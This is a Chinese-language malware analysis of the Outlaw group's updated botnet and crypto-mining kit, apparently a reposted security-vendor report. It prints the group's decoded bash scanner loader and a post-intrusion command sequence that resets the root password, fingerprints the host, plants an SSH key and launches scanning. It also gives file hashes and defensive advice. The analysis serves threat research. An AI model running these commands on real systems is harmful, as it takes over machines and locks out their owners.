网络犯罪集团保持沉默不一定意味着没有活动, 过去几个月一直保持沉默的黑客组织 Outlaw 更新了其武器库.
自从去年 6 月以来该组织一直保持沉默, 在 12 月活动有所增加. 研究人员发现该组织对武器功能进行了更新, 扩展了扫描程序的参数和目标, 改进了规避技术, 提高了攻击带来的经济利益. 这些工具旨在窃取汽车和金融行业信息, 对目标系统发动后续攻击和出售被盗信息.
技术分析
新样本利用已知漏洞来针对 Linux 和 Unix 操作系统, 服务器以及物联网 (IoT) 设备, 新添加了 CVE-2016-8655 和 Dirty COW 漏洞 (CVE-2016-5195) 利用模块, 使用 PHP web Shell 攻击具有 SSH 和 Telnet 弱凭据系统. 活动中未观察到网络钓鱼或社会工程学攻击, 发现了大规模定时 IP 扫描操作.
流量中的命令异常特征:
样本中攻击是从 VPS 开始的, 该服务器搜索存在漏洞的计算机进行入侵, 感染后就会启动扫描活动, 并传播僵尸网络. 攻击者试图利用 base-64 编码来逃避流量检查. 解码扫描器显示以下代码:
- #!/bin/bash
- cd /tmp
- rm -rf .SSH
- rm -rf .mountfs
- rm -rf .X13-unix
- rm -rf .X17-unix
- rm -rf .X19-unix
- mkdir .X19-unix
- cd .X19-unix
- mv /var/tmp/dota3.tar.gz dota3.tar.gz
- tar xf dota3.tar.gz
- sleep 3s && cd /tmp/.X19-unix/.rsync/c
- nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168>> /dev/null 2>1&
- sleep 8m && nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16>> /dev/null 2>1&
- sleep 20m && cd ..; /tmp/.X19-unix/.rsync/initall 2>1&
- exit 0
发现的攻击组件为 tgz 格式, 另外还观察到一些伪装为 PNG 或 jpg 的样本. 最新版本的代码试图删除以前所有相关的文件和代码, 包括自己的代码 (以确保更新正在运行的组件) 和其他网络罪犯组织的攻击代码, 并创建新工作目录'/tmp/.X19-unix'放置工具并提取文件. 然后, tsm 二进制文件后台运行, 将一系列错误消息发送到 / dev/null 以保持代码运行, 等待 20 分钟后再运行脚本 initall:
2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a initall
成功入侵后另一个变体将执行命令, 从受感染机器上收集信息(CPU 核心数, 用户, 计划任务, 正在运行的进程, 已安装的操作系统以及 CPU 和内存信息), 将密码更改为随机字符串存储在 / tmp/up.txt 中.
cat /proc/cpuinfo | grep name | wc -l echo "root:TXhf4ICTayIh"|chpasswd|bash echo "321"> /var/tmp/.var03522123 rm -rf /var/tmp/.var03522123 cat /var/tmp/.var03522123 | head -n 1 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ls -lh $(which ls) which ls crontab -l w uname -m cat /proc/cpuinfo | grep model | grep name | wc -l top uname uname -a lscpu | grep Model echo "root 123"> /tmp/up.txt rm -rf /var/tmp/dota* <send Outlaw kit (the archive file) to compromised host via SFTP> cat /var/tmp/.systemcache436621 echo "1"> /var/tmp/.systemcache436621 cat /var/tmp/.systemcache436621 sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAk.....<shortened> cd ~ && rm -rf .SSH && mkdir .SSH && echo "SSH-rsa AAAAB3N.....<shortened>
运行后会删除以前攻击的文件和脚本, 保持静默从而逃避检测. 如果系统先前已被感染了, 它会尝试杀死正在运行的矿工程序及其所有相关活动. 最新样本的 bashtemp 目录中还有其他脚本 init 和 init2:
0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 init
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 init2
init 和 init2 脚本确保杀死所有其他正在运行的挖矿服务, 并授予工作目录 777 权限确保所有文件都可执行. 还发现 init0 脚本, 该脚本会无差别清除所有矿工.
恶意软件会重置 cron 并删除缓存文件, 启动脚本和二进制文件 init0, 修改 crontab 保持控制权, Shellbot 伪装成 rsync 进程逃避检测.
Shellbot 脚本在受害者系统重启后运行, 脚本 / a/upd,/b/sync / 和 / c/aptitude / 会添加到 crontab 中. 最新版本 upd,sync 和 aptitude 功能被禁用. Shellbot 通过 C&C 服务器发送命令来控制僵尸网络, 从受感染系统收集的所有结果和系统信息都将现在本地保存, 由攻击者利用 C&C 采集信息.
还发现了基于 Android Package Kits(APK)和基于 Android Debug Bridge(ADB)的命令, 这些命令可在 Android 系统中启用挖矿活动:
总结
2018 年发现该组织以来, Outlaw 持续使用一套攻击脚本, 代码和命令, 不同的版本在代码迭代之后会简单的重命名, 遵循特定的格式, 与代码的实际功能无关.
该组织将公开漏洞利用作为攻击手段, 广泛的进行 IP 地址扫描活动, 在特定时期内攻击特定区域. 该小组会利用先前攻击活动中的一些细节来最大程度地获利. 他们也了解欧洲现有的法律, 有意避开攻击某些国家, 避免在某些国家被公诉.
公司企业应定期更新系统, 关闭未使用端口, 保护面向互联网的设备, 采用多层安全解决方案, 从网关到端点保护系统, 并通过行为分析和沙箱阻止恶意 URL.
IOCs
URLs
来源: http://www.tuicool.com/articles/QB7NBrN